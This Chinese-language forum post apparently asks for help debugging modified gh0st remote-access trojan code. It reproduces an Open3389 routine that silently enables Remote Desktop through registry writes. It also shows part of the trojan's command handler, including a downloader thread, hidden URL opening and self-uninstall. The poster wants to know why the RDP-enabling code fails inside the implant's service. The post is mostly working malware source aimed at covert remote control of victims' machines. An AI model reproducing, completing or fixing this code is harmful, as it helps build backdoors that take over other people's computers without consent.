也就是这段代码 在系统服务里面执行失效了 但是在 客户端软件控制界面 随便把这个代码加入进去 确有开启远程
void CKernelManager::Open3389()
{
DWORD Port = 3389;
CreateStringReg(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\netcache","Enabled","0");
MyCreateDWORDReg(HKEY_LOCAL_MACHINE,"SOFTWARE\\Policies\\Microsoft\\Windows\\Installer","EnableAdminTSRemote",0x00000001);
CreateStringReg(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon","ShutdownWithoutLogon","0");
MyCreateDWORDReg(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server","TSEnabled",0x00000001);
MyCreateDWORDReg(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\TermDD","Start",0x00000002);
MyCreateDWORDReg(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\TermService","Start",0x00000002);
MyCreateDWORDReg(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server","fDenyTSConnections",0x00000001);
MyCreateDWORDReg(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\RDPTcp","PortNumber",Port);
MyCreateDWORDReg(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp","PortNumber",Port);
MyCreateDWORDReg(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp","PortNumber",Port);
CreateStringReg(HKEY_USERS,".DEFAULT\\Keyboard Layout\\Toggle","Hotkey","2");
MyCreateDWORDReg(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server","fDenyTSConnections",0x00000000);
return;
}
void CKernelManager::CreateStringReg(HKEY hRoot,char *szSubKey,char* ValueName,char *Data)
{
HKEY hKey;
//打开注册表键,不存在则创建它
long lRet=RegCreateKeyEx(hRoot,szSubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL);
if (lRet!=ERROR_SUCCESS)
{
return;
}
//修改注册表键值,没有则创建它
lRet=RegSetValueEx(hKey,ValueName,0,REG_SZ,(BYTE*)Data,strlen(Data));
if (lRet!=ERROR_SUCCESS)
{
return;
}
RegCloseKey(hKey);
}
//用于修改数字类型键值
void CKernelManager::MyCreateDWORDReg(HKEY hRoot,char *szSubKey,char* ValueName,DWORD Data)
{
HKEY hKey;
//打开注册表键,不存在则创建它
long lRet=RegCreateKeyEx(hRoot,szSubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL);
if (lRet!=ERROR_SUCCESS)
{
return;
}
DWORD dwSize=sizeof(DWORD);
//修改注册表键值,没有则创建它
lRet=RegSetValueEx(hKey,ValueName,0,REG_DWORD,(BYTE*)&Data,dwSize);
if (lRet!=ERROR_SUCCESS)
{
return;
}
RegCloseKey(hKey);
}
这段代码 在 gh0st到服务端 不执行 我即使把它放到
break;
case COMMAND_DOWN_EXEC: // 下载者
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_DownManager,(LPVOID)(lpBuffer + 1), 0, NULL, true);
SleepEx(101,0); // 传递参数用
break;
case COMMAND_OPEN_URL_SHOW: // 显示打开网页
Open3389(); //我即使把它放到这里也不执行 这个有打开网站了 但是就是不执行open3389 但是 我在gh0st的控制台 也就是控制服务端的那个软件随便加入 确有开启远程
OpenURL((LPCTSTR)(lpBuffer + 1), SW_SHOWNORMAL);
break;
case COMMAND_OPEN_URL_HIDE: // 隐藏打开网页
OpenURL((LPCTSTR)(lpBuffer + 1), SW_HIDE);
break;
case COMMAND_REMOVE: // 卸载,
UnInstallService();
[课程]Linux pwn 探索篇!
严打严打
